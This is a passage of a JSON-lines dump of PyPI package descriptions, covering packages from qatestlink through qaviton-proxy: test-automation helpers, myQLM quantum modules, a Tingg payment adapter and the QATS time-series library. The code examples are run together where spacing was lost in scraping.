\"ntz-qa.tk\",\n \"port\": 86\n },\n \"dev_key\": \"1bfd2ef4ceda22b482b12f2b25457495\",\n \"log_level\":\"INFO\"\n}TestsYou will need real testlink app running before you can just execute on command linepython setup.py testGetting StartedJust starting example of usage before readUsage Guide.Create JSON configuration ( runtime or read from file,read config section)Instancetestlink_managerobjecttestlink_manager = TLManager(settings=my_json_config)Use somemethod name with prefix\u2018api_\u2019fromqatestlink.core.testlink_managerimportTLManagerfromqatestlink.core.utilsimportsettingsSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")try:tlm=TLManager(settings=SETTINGS)ifnottlm.api_login():raiseException(\"Not logged for TestlinkWebApp\")# ENDprint(tlm.api_tprojects())print(\"Test PASSED!\")exceptExceptionaserr:print(\"ERROR:{}\".format(err))importpdb;pdb.set_trace()# TODO, remove DEBUG laneprint(\"Test FAILED!\")"} +{"package": "qa_tests", "pacakge-description": "UNKNOWN"} +{"package": "qatg", "pacakge-description": "No description available on PyPI."} +{"package": "qat-hardware", "pacakge-description": "Module qat-hardwareThis moduleqat-hardwareis part ofmyQLM Power Access (a.k.a. QLMaaS)project. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. 
Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install qlmaasLicenseAtos myQLM EULA"} +{"package": "qatingg", "pacakge-description": "CELLULANT EXPRESSqatinggPython adapter for Cellulant Tingg express checkout version 2.1To install:pip install qatinggFor all calls you first have to initiate the adapter with your credentials\nYou can find your credentials over here:Developer portalParamsParamRequiredDescriptionclient idTrueUsed to Encryptclient secretTrueUsed to Encryptservice codeTrueUsed to Encryptaccess_keyTrueUsed to EncryptdomainTruespecify environment:stagingorsandboxurlTrueUsed to pass custom urlpathTrueUsed to pass custom pathadapter = MulaAdapter(, , , , , , )domain:User have two options.These are cellulant's testing environments:STAGING \nor \nSANDBOX\nor\nLOCALadapter.get_encryption(msisdn='0730xxxxxxx',customer_first_name='John',customer_last_name='Doeh',customer_email='john.doeh@jd.com',transaction_id='',account_number='066564ACC',amount=1000,currency_code='KES',country_code='KE',description='Airticket',due_date='2019-10-0112:12:00',orint(30)#Minutespayer_client_code='i8UytECD',language_code='en',success_url='http://callbackurl.com/success',fail_url='http://callbackurl.com/fail',callback_url='http://callbackurl.com/callback')due_date:User can pass the number of minutes(int) for the session or use cellulant data format(''Y-m-d H:M:S'')\nTo get the express page:checkout_type:Cellulant have several ways of checkoutExample:\n-------------\nmodal\nexpress\nthemed-checkout\n---------------Note: Add payer client code, ONLY if you're testing single payment option'This will return checkout response as a url.Example below:Example urlCode Sampleimportsysfromtingg.adaptersimportTinggAdapterimportrandomdefget_response():init=TinggAdapter(iv_key=\"h3tckgMNxxxxx\",secret_key=\"Nmxx6546xxxxxx\",access_key=\"$2a$08$wQ2ghgfhgfhfghfh64564\",service_code=\"EWWW5763434\",domain=\"SANDBOX\",url=\"http://localhost:3020\",path=\"/\")response=init.get_encryption(msisdn='0724565xxxx',customer_first_name='John',customer_last_name='Doeh',customer_email='john.doeh@jd.com',transaction_id=random.randint(0,sys.maxunicode),account_number='3434364ACC',amount=1000,currency_code='UGX',country_code='UG',description='Air ticket',checkout_type=\"express\",due_date=30,# or \"2019-12-12 12:12:12\"payer_client_code='',language_code='en',success_url='http://callbackurl.com/success',fail_url='http://callbackurl.com/fail',callback_url='http://callbackurl.com/callback')#To see code returnedprint(response)returnresponseTestsRunning testspython setup.py test"} +{"package": "qat-lang", "pacakge-description": "Module qat-langThis moduleqat-langis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides tools for building quantum circuits.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. 
Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qatools", "pacakge-description": "QAQA is an advanced tool for Android testing!Installpip3install-Uqatools-ihttps://pypi.tuna.tsinghua.edu.cn/simpleDescriptionusage:qa[-h][-v]{clear,info,adb,remote,proxy,unproxy}...\n\nQAisanadvancedtoolforAndroidtesting!Created:Lijiawei.Version0.0.8\n\npositionalarguments:{clear,info,adb,remote,proxy,unproxy}sub-commandhelpclearclearappcachedata.infoshowappsettingpage.adbcompleteadbdebuggingcapability.remoteopenAndroiddeviceremotedebuggingport(5555).proxyenabledeviceglobalproxy(172.17.30.10:8888).unproxydisabledeviceglobalproxy.\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-v,--versionshowversionClearClear app cache dataqaclearcom.test.appInfoShow app infoqainfocom.test.appAdbComplete adb debugging capabilityqaadbRemoteOpen Android device remote debugging port(5555)qaremoteProxyEnable device global proxy# default proxy port is 8888qaproxy# custom proxy portqaproxy5555UnproxyDisable device global proxyqaunproxy"} +{"package": "qatools-ifchange", "pacakge-description": "No description available on PyPI."} +{"package": "qat-quops", "pacakge-description": "Module qat-quopsThis moduleqat-quopsis part ofmyQLM Power Access (a.k.a. QLMaaS)project. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install qlmaasLicenseAtos myQLM EULA"} +{"package": "qatrah", "pacakge-description": "QatraH | \u0642\u0637\u0631\u0629 | (Droplet)Using quantum computing to design a more precise, environmental friendly and robust water distribution network and debugging.QatraH Website LinkNYUAD Hackathon for Social Good in the Arab World: Focusing on Quantum Computing (QC) and UN Sustainable Development Goals (SDGs).https://nyuad.nyu.edu/en/events/2023/april/nyuad-hackathon-event.htmlPresentationThe Slides can be viewed atinformation.MotivationSolving quantum solution for water based distibution and debugging using quantum computing.\nBuzz words: WDN, Quantum Computing, QUBO, QML, Optimization, Pennylane, JaxQuantum algorithm:Variational Quantum Eigensolver (VQE)Quantum Approximate Optimization Algorithm (QAOA)Quantum Machine Optimization AlgorithmQuantum Machine Learning on GraphInstallation Instructions:Requirements:pip3 install -r requirements.txt*Conda users, please make sure toconda install pipand use it for the above requirements.Input to the program:Sensor readingsPaths from source to sensorDataset of the water sample like from DEWA site under paywallReplacing Classical Pressure Sensors with Optimized Quantum SensorsCompared to classical pressure sensors, quantum sensors are not invasive. They are also tolerant to the changes in the environment around it while also being more accurate. This improves the ability to detect pipe leakage.Leak Detection and LocalizationLeakage in water distribution systems has been a challenge for water management committees. The real-life data collected from the optimal placed sensors, can be used to predict and localise leakage by identifying the deviations of pressure in the network. 
This task can be done both using QUBO and Quantum Machine Learning based models.Using Quantum Machine LearningExisting classical literature suggests the use of machine learning to predict leakage and localise it to a particular pipe using the data from pressure sensors in the WDN at any given point of time. We attempt to solve the same using a quantum machine learning based model.Specifically, we collect the pressure data from the optimally-placed sensors in a water distribution network to predict leakage in the WDN using a quantum neural network. It is implemented in the Pennylane framework using Jax. The data is fed into the model using Angle encoding. The model is composed of a parametrised quantum circuit with RY, RZ and CNOT gates which are trained over a total of 500 epochs. We use a train to test-set ratio of 4:1 and optimise the model using Rectified Adam over the binary cross-entropy loss. At the end we obtain a test accuracy of 87.02% over the dataset of size 650.AcknowledgementsHackers:Anas,Basant,Mohammed,Airin,Lakshika,Sanjana,Selin Doga,YaserMentors:Fouad,El Amine,Victory Omole,Akash KantAnd thank you to the organising committee of NYUAD 2023 Hackathonhttps://nyuad.nyu.edu/en/events/2023/april/nyuad-hackathon-event.htmland Qbraid and other students who made it possible and great."}
+{"package": "qats", "pacakge-description": "QATSPython library and GUI for efficient processing and visualization of time series.GeneralAboutThe python library provides tools for:Import and export from/to various pre-defined time series file formatsSignal processingInferring statistical distributionsCycle counting using the Rainflow algorithmIt was originally created to handle time series files exported fromSIMOandRIFLEX. Now it also\nhandlesSIMAhdf5 (.h5) files,\nMatlab (version < 7.3) .mat files, CSV files and more.QATS also features a GUI which offers efficient and low threshold processing and visualization of time series. It is\nperfect for inspecting, comparing and reporting:time seriespower spectral density distributionspeak and extreme distributionscycle distributionsDemoGetting startedInstallationRun the below command in a Python environment to install the latest QATS release:python -m pip install qatsTo upgrade from a previous version, the command is:python -m pip install --upgrade qatsYou may now import qats in your own scripts:>>>fromqatsimportTsDB,TimeSeries... or use the GUI to inspect time series.New in version 5.0.0.TheQtbindingPySide6is installed withqats.\nIf you would rather like to usePyQt6, runpython -m pip install pyqt6If multiple Qt bindings are installed, the one to use may be controlled by setting the environmental variableQT_APIto the desired package. Accepted values includepyqt6(to use PyQt6) andpyside6(PySide6). For more details, seeREADME file for qtpy.The GUI may now be launched by:qats appTo create a start menu link, which you can even pin to the taskbar to ease access to the\nQATS GUI, run the following command:qats config --link-appTake a look at the resources listed below to learn more.New in version 4.11.0.The command line interface is also accessible by running Python with the '-m' option. The following commands are equivalent to those above:python -m qats apppython -m qats config --link-appResourcesSourceIssuesChangelogDocumentationDownloadContributeThese instructions will get you a copy of the project up and running on your local machine for development and testing\npurposes. 
See deployment for notes on how to deploy the project on a live system.PrerequisitesInstall Python version 3.8 or later from eitherhttps://www.python.orgorhttps://www.anaconda.com.Install Poetry withthe official installer.Install thepoetry-dynamic-versioningplugin:poetry self add \"poetry-dynamic-versioning[plugin]\"Clone the source code repositoryAt the desired location, run:git clone https://github.com/dnvgl/qats.gitInstallingTo get the development environment running...poetry installThis willcreate an isolated environmentinstall all dependencies including those required for development, testing and building documentationand install the package in development (\"editable\") modeYou should now be able to import the package in the Python console,>>>importqats>>>help(qats)... and use the command line interface (CLI).qats -hNew in version 4.11.0.The CLI is also available frompython -m qats -hRunning the testsThe automated tests are run usingunittest.python -m unittest discoverBuilding the packageBuild tarball and wheel distributions bypoetry buildThe builds appear in the.distfolder. The distributions adhere to thePEP 0427convention{distribution}-{version}(-{build tag})?-{python tag}-{abi tag}-{platform tag}.whl.Building the documentationThe html documentation is built usingSphinxsphinx-build -b html docs\\source docs\\_buildTo force a build to read/write all files (always read all files and don't use a saved environment), include the-aand-Eoptions:sphinx-build -a -E -b html docs\\source docs\\_buildVersioningWe apply the \"major.minor.micro\" versioning scheme defined inPEP 440. See alsoScheme choicesonhttps://packaging.python.org/.Versions are tagged with Git tags likev3.0.1. See thetags on this repository.Release and deploymentWe use therelease cycle in GitHubto cut new releases.Once a new release is published,GitHub Actionstakes care of the packaging, unit testing and deployment toPyPi.The workflows for continuous integration and deployment are found in.github/workflows.AuthorsPer Voie-tovopErling Lone-eneeloLicenseThis project is licensed under the MIT License - see theLICENSEfile for details."} +{"package": "qattools", "pacakge-description": "No description available on PyPI."} +{"package": "qat-variational", "pacakge-description": "Module qat-variationalThis moduleqat-variationalis part ofmyQLMproject. myQLM is a quantum\nsoftware stack for writing, simulating, optimizing, and executing quantum programs. This module\nprovides tools to define and manipulate variational quantum algorithm.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. 
Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qAuth-rasa97", "pacakge-description": "No description available on PyPI."} +{"package": "qautils", "pacakge-description": "Code Metrics by sonarqubePython tested versions3.63.53.43.33.22.7SupportedSupportedSupportedNot SupportedNot SupportedSupportedHow to install ?Install from PIP file :pip install qautilsInstall from setup.py file :python setup.py installHow to exec tests ?Tests from setup.py file :python setup.py testGetting StartedJust starting example of usage before readUsage Guide.fromqautils.filesimportsettings# file_path = './' by defaultSETTINGS=settings(file_path=\"/home/user/config/dir/\",file_name=\"settings.json\")KEY_TO_CHECK=\"some_json_key_name\"try:print(SETTINGS[KEY_TO_CHECK])exceptExceptionaserr:print(\"ERROR:{}\".format(err))finally:bot.close()ContributingWe welcome contributions toqautils! These are the many ways you can help:Submit patches and featuresMakeqautils(new updates for community)Improve the documentation forqautilsReport bugsAnddonate!Please read ourdocumentationto get started. Also note that this project\nis released with acode-of-conduct, please make sure to review and follow it."} +{"package": "qauto.makefile", "pacakge-description": "No description available on PyPI."} +{"package": "qauto.makefile.machine-action.avast", "pacakge-description": "No description available on PyPI."} +{"package": "qauto.result-reporter", "pacakge-description": "No description available on PyPI."} +{"package": "qav", "pacakge-description": "Question Answer Validation (qav)qav is a Python library for console-based question and answering, with the\nability to validate input.It provides question sets to group related questions. Questions can also\nhave subordinate Questions underneath them. Answers to those questions can be\nvalidated based on a simple, static piece of information provided by you.\nAnswers may also be validated dynamically based on the information provided in\nprevious questions.Example Usage>>> from qav.questions import Question\n>>> from qav.validators import ListValidator\n>>> q = Question('How old am I? ', 'age', ListValidator(['20', '35', '40']))\n>>> q.ask()\nPlease select from the following choices:\n [0] - 20\n [1] - 35\n [2] - 40\nHow old am I? : 0\n>>> q.answer()\n# returns => {'age': '20'}RequirementsnetaddrInstallation$ pip install qavCompatibilityThis library has been tested to support:Python 3.6It most likely will still run on Python 2.7, but official support has been dropped.Licenseqav - question answer validation in Python\nCopyright (C) 2015 UMIACS\n\nThis library is free software; you can redistribute it and/or\nmodify it under the terms of the GNU Lesser General Public\nLicense as published by the Free Software Foundation; either\nversion 2.1 of the License, or (at your option) any later version.\n\nThis library is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\nLesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public\nLicense along with this library; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nEmail:\n github@umiacs.umd.edu"} +{"package": "qavifiserver", "pacakge-description": "qifimanager"} +{"package": "qaviton", "pacakge-description": "The first open source project to facilitate a unified testing automation framework for Web, Mobile & IoT\nwith Machine Learning, AI and much more:https://www.qaviton.comInspired by Appium & Selenium, Qaviton is a play on words for Graviton.\nIn theories of quantum gravity, the graviton\nis the hypothetical elementary particle that mediates the force of gravity.\nQaviton is like the Graviton in the sense that if it exists,\nit will be the solution to a fundamental problem in its field.Qaviton offers an easy framework to automate tests that can run against any driver or any testing scenario,\nand is meant to be like the React Native of software testing.Installingmake sure you have python 3.7+ installed.we recommend using venv:python -m venv venv\nsource venv/bin/activate || venv\\\\Scripts\\\\activateInstall and update usingpip:pip install -U qavitonto exit your virtual environment:(venv) path/to/tests>deactivateSimple Examplespython-mqavitoncreatewebtestspython-mqavitoncreateweb,mobiletestspython-mqavitoncreatewebtests--examplepython-mpytesttests$ python -m qaviton create tests\n * creating qaviton tests\n * your testing framework is done!\n * start testing like a boss \u269b\n * ______________\n * / __________ \\ ______\n * / / \\ \\ / ____ \\\n * / / \\ / \\ \\ / / \\ \\ __ __ _ ___________ _______ _ _\n * | | O \\ / O | | / |______| \\ \\ \\ / / |_| |____ ____| / _____ \\ | \\ | |\n * | | | | | ________ | \\ \\ / / |-| | | | | | | | \\ | |\n * \\ \\ \\________/ / \\ | | | | \\ \\ / / | | | | | | | | | | \\ | |\n * \\ \\____________/ /\\ \\_ | | | | \\ \\/ / | | | | | |_____| | | |\\ \\| |\n * \\________________/ \\__| |_| |_| \\__/ |_| |_| \\_______/ |_| \\___|run tests with local hubinstall docker:https://docs.docker.com/install/install selenoid:\ngo to option 2 to install with dockerhttps://github.com/aerokube/selenoid/blob/master/docs/quick-start-guide.adocgo to your secret file and change your hub url to local host:/project/tests/data/secret.pyhub=\u2019http://localhost:4444/wd/hub\u2019CommunityPlease checkout our public test repository at:https://github.com/qaviton/test_repositoryThe Qaviton team wants to contribute and share testing experience.\nYou can use our tests and utilities in your project\nand even share your own tests code, functions and experience.Be part of something big.ContributingFor guidance on setting up a development environment and how to make a\ncontribution to Qaviton, see thecontributing guidelines.DonateThe Qaviton organization develops and supports qaviton and the libraries\nit uses. 
In order to grow the community of contributors and users, and\nallow the maintainers to devote more time to the projects,please\ndonate today.LinksWebsite:https://www.qaviton.comDocumentation:https://github.com/qaviton/qaviton/blob/master/docs/License:Apache License 2.0Releases:https://pypi.org/project/qaviton/Code:https://github.com/qaviton/qavitonIssue tracker:https://github.com/qaviton/qaviton/issuesTest status:Linux, Mac:https://travis-ci.org/qaviton/qavitonWindows:https://ci.appveyor.com/project/qaviton/qavitonTest coverage:https://codecov.io/gh/qaviton/qaviton"} +{"package": "qaviton-git", "pacakge-description": "Qaviton Gitsuper light! super powerful! git wrapperInstallationpipinstall--upgradeqaviton_gitRequirementsgit 2.16+Python 3.6+Usagefromqaviton_gitimportGitrepo=Git.clone(path='',url='https://github.com/qaviton/qaviton_git.git',username='xxxx',password='xxxx',email='xx@x.x')withopen('newfile','w')asf:f.write('rock git hard')repo.commit('new file').push()"} +{"package": "qaviton-handlers", "pacakge-description": "Qaviton Handlerserror handling utilitiesInstallationpipinstall--upgradeqaviton_handlersRequirementsPython 3.6+Featuresretry decorator \u2713retry with context \u2713try functions \u2713catch errors \u2713simple Exception wrapper \u2713Usagedefretry(tries=3,delay=0,backoff=1,jitter=0,max_delay=None,exceptions=Exception,logger:Logger=log):\"\"\"Retry function decorator \\ try a context of actions until attempts run out:param exceptions: an exception or a tuple of exceptions to catch. default: Exception.:param tries: the maximum number of attempts: -1 (infinite).:param delay: initial delay between attempts. default: 0.:param max_delay: the maximum value of delay. default: None (no limit).:param backoff: multiplier applied to delay between attempts. default: 1 (no backoff).fixed if a number, random if a range tuple (min, max), functional if callable (function must receive **kwargs):param jitter: extra seconds added to delay between attempts. default: 0.fixed if a number, random if a range tuple (min, max), functional if callable (function must receive **kwargs):param logger: logger.warning(fmt, error, delay) will be called on failed attempts.default: retry.logging_logger. 
if None, logging is disabled.\"\"\"retry decoratorfromqaviton_handlers.try_decoratorimportretry@retry()deffoo():n=int('1'+input('select number:'))print(n)foo()retry with contextfromqaviton_handlers.try_contextimportretrywithretry()astrying:whiletrying:withtrying:print(\"Attempt #%dof%d\"%(trying.attempt,trying.attempts))raiseusing different try wrapper functionsfromqaviton_handlers.try_functionsimporttry_to,try_or_none,multi_try,multi_try_no_breakdeffoo(a=0):print(float(a+input(\"select number:\")))# simply trytry_to(foo,1)try_to(foo,2)try_to(foo,3)# get the errorerror=try_to(foo,4)iferror:print(error)# if error occurrediftry_to(foo,5):try_to(foo,5)# try with key argumentsr=try_to(lambdaa,b,c:a*b*c,1,kwargs={'b':2,'c':3})print(r)# try to get a numbernumber=try_or_none(lambdaa:float(a+input(\"select number:\")),6)ifnumber:print(number)# try many functions, return a list of results, or an error# if an error occurred, the multi try stopsmulti_try(lambda:foo(10),lambda:foo(11),)# specify errors to ignoreresponse=multi_try(lambda:foo(13),lambda:foo(14),exceptions=Exception,)# handle the errorresponse=multi_try(lambda:foo(13),lambda:foo(14),)ifisinstance(response,Exception):...# try many functions, return a list of results, some may be errors# if an error occurred, the multi try continuesmulti_try_no_break(lambda:foo(8),lambda:foo(9),lambda:foo(0),)ignore errors now so you can handle them laterfromqaviton_handlers.catchimportCatchfromqaviton_handlers.utils.errorimportErrorcatch=Catch(store=True)# catch an errortry:1+'1'exceptExceptionase:catch(e)# a cleaner syntaxwithcatch:1+'1'2+'2'# ignore the errorwithCatch():5*'e'print(f\"caught{catch.count}errors\")print(f\"caught first{catch.first}\")print(f\"caught last{catch.last}\")# make your own CatchclassMyCatch(Catch):defhandler(self,e):self.stack.add(Error(e))ifself.log:self.log.warning(f\"I caught{e}\")returnself"} +{"package": "qaviton-helpers", "pacakge-description": "qaviton helpersa collection of nice objects and functions to make things simple"} +{"package": "qaviton-io", "pacakge-description": "Qaviton IOQaviton IOis a package with a simple API, making use of python's async & multiprocessingto enable fast execution of many asyncable operations.Installationpipinstallqaviton-io-URequirementsPython 3.6+Featuresasync task managerprocess task managertask loggerUsageasync manager:fromtimeimporttimefromrequestsimportget# lets make use of requests to make async http callsfromqaviton_ioimportAsyncManager,task# let's create an async managerm=AsyncManager()# first we make a simple function to make an http call.# we want to log the result,# and make sure that in case of an exception# the manager won't stop@task(exceptions=Exception)deftask():returnget(\"https://qaviton.com\")# this will run async tasks and measure their durationdefrun(tasks):t=time()m.run(tasks)t=time()-tprint(f'took{round(t,3)}s')# let's run our task once and see how long it takesrun([taskfor_inrange(1)])# now let's run our task 20 times and see how long it takesrun([taskfor_inrange(20)])# we can assert the collected results hereassertlen(m.results)==21forrinm.results:assertr.status_code==200# let's view the results in the log reportm.report()process manager:\"\"\"make sure your tasks are defined at the module level,so they can be pickled by multiprocessing\"\"\"fromtimeimporttimefromrequestsimportgetfromqaviton_io.typesimportTasksfromqaviton_ioimportProcessManager,taskfromtracebackimportformat_exc# now we make some tasks# this is a nested task# we don't want to handle any exceptions# 
so in case of failure the parent will not proceed@task()deftask1(url):r=get(url)r.raise_for_status()# this is the prent task# we want to handle all exceptions# so in case of failure the next task will execute@task(exceptions=Exception)defmulti_task():forurlin[\"https://qaviton.com\",\"https://qaviton.co.il\",# make sure you enter a valid address\"https://qaviton.com1\",# make sure you enter a valid address]:task1(url)# let's create a function to execute tasksdefexecute_tasks(tasks:Tasks,timeout):manager=ProcessManager()t=time()try:manager.run_until_complete(tasks,timeout=timeout)timed_out=NoneexceptTimeoutError:timed_out=format_exc()t=time()-tmanager.report()print(f'took{round(t,3)}s\\n')manager.log.clear()returntimed_out# now all that's left is to run the tasksif__name__==\"__main__\":timeouts=[execute_tasks([multi_taskfor_inrange(1)],timeout=3),execute_tasks([multi_taskfor_inrange(20)],timeout=6),execute_tasks([multi_taskfor_inrange(80)],timeout=9),]fortimeoutintimeouts:iftimeout:print(timeout)notes:for good performance and easy usageyou should probably stick with using the AsyncManagerThe ProcessManager uses async operations as well as multi-processing.It distributes tasks across cpus, and those tasks are executed using the AsyncManagerif you want maximum efficiency you should consider using the ProcessManagerThe ProcessManager uses the multiprocessing moduleand should be treated with it's restrictions & limitations accordinglyThe ProcessManager gets stuck easily,make sure to use timeouts when using it"} +{"package": "qaviton-log", "pacakge-description": "Qaviton LogQaviton LogIts a simple wrapper to the logging module.With easy API of logging to a file or to the console.Usagefromqaviton_logimportLoggerlog=Logger(file='log')log.info('hi')log.warning('bye')"} +{"package": "qaviton-monitors", "pacakge-description": "Qaviton Monitorsat the moment this library contains a simple monitoring scriptfor measuring:memorydiskcpurunning processesnetwork bandwidthInstallationpipinstall--upgradeqaviton_monitorsRequirementsPython 3.6+Featuressimple monitor script \u2713(more features might be added on demand) *Usageactivating simple monitor script# app.pyfromqaviton_monitors.simple_monitorimportmonitormonitor()Press Enter to stop monitoring\n\n\n======================== Monitor ========================\n\nLast Boot: 'boot_time'\nSystem Uptime: 'uptime'\n\nCPU Cores cpu_count\nMEMORY total mGB | used mGB | free mGB\nDISK total dGB | used dGB | free dGB\n\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs\n%(asctime)s | CPU n% MEMORY n% DISK n% Running Processes n NetIO i:o GBs"} +{"package": "qaviton-package-manager", "pacakge-description": "Qaviton Package ManagerQaviton Package Manager (qpm)is a package management tool integrated with git.to enable management of packages both public & private,from git repositories, in addition to the standard package manager.Replace redundant packaging systems using qpm:Package everything using git tags:>qpm --build\n |\nbranch: dev\n |\nbranch: tests\n | \n[tag 2019.9.1] \n |\n[tag 2019.9.2]\n |\nbranch: release/latest\n\n\n>qpm --install \"git+https://url/owner/project.git@release/latest#egg=package:>=2019.9.2\"\n | | | | | | | |\nqaviton install vcs+protocol://project_url @branch #egg=package (optional) \npackage method type directory pep-440 pep-508\nmanager path :version_specifierInstallationpipinstall--upgradeqaviton_package_managerRequirementsgit 2.16+Python 
3.6+FeaturesCI CD workflow \u2713managing private+public packages \u2713managing nested private packages \u2713cli + scripting \u2713pip capabilities \u2713git capabilities \u2713pypi capabilities \u2713automatic builds \u2713secure credentials \u2713cross-platform \u2713nested/multiple packages \u2717pip -e installs \u2717 (coming soon)docker build \u2717 (but can be used with the run function)docker push \u2717 (but can be used with the run function)Usagecreating a manager:(venv) windows> qpm ^\n--create ^\n--url \"https://github.com/owner/project.git\" ^\n--username \"user1\" ^\n--password \"pass@#$\" ^\n--email \"awsome@qaviton.com\" ^\n--pypi_user \"supasayajin\" ^\n--pypi_pass \"final space\"(venv)bash$qpm\\--create\\--url\"https://github.com/owner/project.git\"\\--username\"user1\"\\--password\"pass@#$\"\\--email\"awsome@qaviton.com\"\\--pypi_user\"supasayajin\"\\--pypi_pass\"final space\"\\/this should leave you with the following project structure:project/\n \u251c package/\n \u2502 \u2514 __init__.py # with __author__, __version__, __author_email__, __description__, __url__, __license__\n \u251c tests/\n \u2502 \u2514 __init__.py\n \u251c .gitignore\n \u251c LICENSE \n \u251c README.md\n \u251c requirements.txt\n \u251c requirements-test.txt\n \u251c setup.py\n \u2514 package.py # ignored by .gitignorenow let's build a package:# package.pyfromqaviton_package_managerimportManagerfromqaviton_package_managerimportdecypt# if this is not secure enough, you can add cache_timeout=3600# and store credentials in memory# manager = Manager(cache_timeout=3600)# and we need to insert the credentials in run time: > python package.py --username \"x\" --password \"z\"manager=Manager(**decypt(key=b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx==',token=b'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx==',))if__name__==\"__main__\":# running with lambdas will protect you from processes getting stuckmanager.run(lambda:manager.update(),# pip install -r requirements.txt --upgradelambda:manager.update_test(),# pip install -r requirements-test.txt --upgradelambda:manager.test(),# python -m pytest --junitxml=test_report.xml testslambda:manager.build(),# git commit, tag & push (internal logic is more complicated)lambda:manager.upload(),# upload to pypi)make sure you have at list 1 passing test for your package# tests/my_package_test.pydeftest_with_100p_coverage():print(\"testing my package!\\nPASS\")# we can now create a packagepythonpackage.pyCLI:we can call any method and send any parameter to the manager through cli:# release a version if all tests passqpm--username\"\"--password\"\"--update--update_test--test--build--upload# build a stable version if all tests passqpm--username\"\"--password\"\"--update--update_test--test--build\"stable/latest\"# install cachetools using pip and save the requirement in requirements.txtqpm--installcachetools# cache credentials in memoryqpm--username\"\"--password\"\"--cache_timeout\"-1\"# using the system & python to execute testsqpm--test\"system\"\"echo success\"--test\"python\"\"-c\"\"print(\\\"py success\\\");\"CLI shortcuts:we can call any method and send any parameter to the manager through cli:# install cachetools using pip and save the requirement in requirements.txtqpmicachetools# uninstall cachetools using pip and remove the requirement in requirements.txtqpmuncachetools# build a stable versionqpmb\"stable/latest\"# run testsqpmt# upload to pypiqpmup# install cachetools using pip 
and save the requirement in requirements.txtqpminstallcachetools# build packageqpmbuild\"stable/latest\"# upload to pypiqpmuploadScript:# ci_cd.pyfromqaviton_processesimportrun,escape,pythonfrompackageimportmanagerfromdatetimeimportdatetimed=datetime.utcnow()docker_url=manager.vars['docker_url']docker_user=manager.vars['docker_user']docker_pass=manager.vars['docker_pass']docker_email=manager.vars['docker_email']SSH_PRIVATE_KEY=manager.kwargs['SSH_PRIVATE_KEY']docker_tag=manager.kwargs['docker_tag']branch_build=\"ci_cd/latest\"dev_branch=\"dev\"manager.run(lambda:manager.should_build(from_branch=dev_branch,to_branch=branch_build),lambda:manager.install(),lambda:manager.install_test(),lambda:manager.test.pytest(\"tests/ci_cd\"),lambda:manager.build(to_branch=branch_build,version=f'{d.year}.{d.month}.{d.day}'),# docker distributelambda:run(f\"docker login --username=\\\"{escape(docker_user)}\\\"--password=\\\"{escape(docker_pass)}\\\"--email=\\\"{escape(docker_email)}\\\"\\\"{escape(docker_url)}\\\"\"),lambda:run(f\"docker build --force-rm -t test-multi-stage-builds --build-arg SSH_PRIVATE_KEY=\\\"{escape(SSH_PRIVATE_KEY)}\\\".\"),lambda:run(f\"docker tag{docker_tag}yourhubusername/verse_gapminder:firsttry\"),lambda:run(\"docker push yourhubusername/verse_gapminder\"),# deploy scriptlambda:python(\"deploy.py\"))# schedualer.pyfromtimeimporttime,sleepfromdatetimeimportdatetime,timedeltafromqaviton_processesimportpython_code_asyncd=datetime.utcnow()date=datetime(year=d.year,month=d.month,day=d.day,hour=22)delta=timedelta(days=1)# build a package once a day at 22pmwhileTrue:python_code_async('import ci_cd')date+=deltasleep(date.timestamp()-time())warningsthis manager is meant for automated ci cd purposesand should not be used instead of regular git commit/push/merge.make sure to avoid using it on unstable branchesto avoid failed packaging requests or potential data loss.we recommend using it from a CI CD dedicated branch.the manager defaults to encrypted credentials,if encrypted credentials on the disk are not secure enough,please make sure to enable caching, to store credentials in memory"} +{"package": "qaviton-pip", "pacakge-description": "qaviton_pipa pip wrapper for scripting and automation"} +{"package": "qaviton-processes", "pacakge-description": "Qaviton Processessimple python wrappers for different processesInstallationpipinstall--upgradeqaviton_processesRequirementsPython 3.6+Featuresprogrammatic support for automating different processes \u2713system cli wrapper \u2713async support \u2713pip wrappers \u2713git wrappers \u2713python wrappers \u2713pytest wrappers \u2713Usagesfromqaviton_processes.systemimport(run,pip,git,escape,python,python_code,pytest,run_async,pytest_async,python_async,python_code_async,)stdout:bytes=run(f\"echo\\\"{escape(input('say hi:'))}\\\"\")process=run_async(\"cd proj && touch jig.txt\")whileprocess.poll()isNone:...print(process.stdout,process.stderr)git('clone{url}.git')pip('install','qaviton_processes','-U')python('script.py')python_code('import os','if os.path.exist(\"proj\"+os.sep+\"jig.txt\"):',' print(\"awsome!\")')python_async('-m scripts.monitor','log=log.txt')..."} +{"package": "qaviton-proxy", "pacakge-description": "Qaviton ProxyProxy functionality, developed for flask applications.Installationpipinstall--upgradeqaviton_proxyRequirementsPython 